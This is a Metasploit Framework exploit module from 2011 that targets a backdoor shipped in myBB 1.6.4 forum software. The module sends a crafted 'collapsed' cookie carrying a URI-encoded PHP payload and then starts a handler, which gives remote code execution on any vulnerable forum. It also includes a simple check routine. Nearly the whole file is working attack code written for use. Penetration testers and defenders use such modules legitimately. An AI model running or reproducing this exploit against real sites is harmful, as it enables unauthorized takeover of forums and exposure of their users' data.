##
# $Id: mybb_backdoor.rb 13850 2011-10-10 15:40:59Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'myBB 1.6.4 Backdoor Exploit',
      'Description'    => %q{
        myBB is a popular open source PHP forum software. Version 1.6.4 contained an 
        unauthorized backdoor, distributed as part of the vendor's source package.
      },
      'Author'         =>
        [
          'tdz',
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 13850 $',
      'References'     =>
        [
          [ 'BID', '49993' ],
          [ 'SECUNIA', '46300' ],
          [ 'URL', 'http://blog.mybb.com/2011/10/06/1-6-4-security-vulnerabilit/' ],
          [ 'URL', 'http://blog.mybb.com/wp-content/uploads/2011/10/mybb_1604_patches.txt' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'Space'       => 4000,
          'DisableNops' => true,
          'Keys'        => ['php'],
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Oct 06 2011'
    ))

    register_options(
      [
        OptString.new('URI', [ true, "myBB path", '/index.php']),
      ], self.class)
  end


  def uri
    datastore['URI']
  end

  def check
    print_status("Checking target")
    res = send_request_raw({
      'method' => 'GET',
      'uri' => uri
      }, 10
    )

    if (not res) or (not res.code.between?(200,299))
      return Exploit::CheckCode::Safe
    else
      return Exploit::CheckCode::Detected
    end
  end

  def exploit
    print_status("Sending exploit request")

    # for details of the backdoor mechanism. 
    cookie = "collapsed=0|1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|"
    cookie << Rex::Text.uri_encode(payload.encoded)

    response = send_request_raw({
      'method'  => 'GET',
      'global' => true,
      'uri' => uri,
      'headers' => { 'Cookie' => cookie }
    },10)

    if (not response) or (not response.code.between?(200,299))
      print_error "Cannot connect to #{uri} on #{datastore['RHOST']}, got #{response ? response.code : 'no response'}."
    else
      handler
    end
  end
end